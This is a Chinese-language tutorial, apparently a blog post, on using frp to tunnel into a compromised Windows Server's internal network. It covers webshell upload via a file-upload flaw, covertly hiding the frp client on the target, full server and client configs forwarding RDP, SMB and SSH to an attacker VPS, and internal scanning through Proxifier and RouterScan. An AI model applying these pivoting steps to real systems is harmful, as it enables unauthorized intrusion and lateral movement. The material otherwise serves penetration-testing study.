frp内网穿透

vps跳板机是云服务器linux ,ip:154.12.88.x
靶机是windows server 2012,ip:124.222.180.x

1.服务端配置

在这里插入图片描述

配置frps.ini

在这里插入图片描述

[common]
bind_port = 7000
dashboard_port = 7500
token = 12345678
dashboard_user = admin
dashboard_pwd = admin
vhost_http_port = 10080
vhost_https_port = 10443

启动frp服务端

在这里插入图片描述
浏览器访问:vps-ip:port-154.12.88.197:7500,服务面板,出现以下界面证明服务端启动成功
在这里插入图片描述

2. 客户端配置

get WebShell

也就是靶机/被攻击的机器
首先需要获取到靶机的shell
比如当前靶机有一个上传文件的地方,通过上传马儿,getshell
在这里插入图片描述
在这里插入图片描述
找个不容易被发现的地方,悄悄的将frp客户端上传到靶机😁
在这里插入图片描述

配置frpc.ini

在这里插入图片描述

[common]
server_addr = 154.12.88.197
server_port = 7000
token = 12345678

[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 7001
plugin=socks5

[smb]
type = tcp
local_ip = 127.0.0.1
local_port = 445
remote_port = 7002
plugin=socks5

# 如果被控机是linux则使用以下配置
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 7003
plugin=socks5

启动frp客户端

在这里插入图片描述
启动成功,去控制面板查看,发现已有三个服务启动
在这里插入图片描述

3. 启动Proxifier

配置–>代理服务–>新增
在这里插入图片描述
在这里插入图片描述
配置文件–>代理规则–>将RouterScan带进去,ok

在这里插入图片描述
在这里插入图片描述

4. 启动RouterScan

扫描靶机的地址,即内网地址10.0.16.11,在Proxifier中可查看到流量
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5. 浏览器访问

浏览器访问RouterScan扫出的内网东西,如:http://10.0.16.11/,即可访问被控机的内网服务
在这里插入图片描述

  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值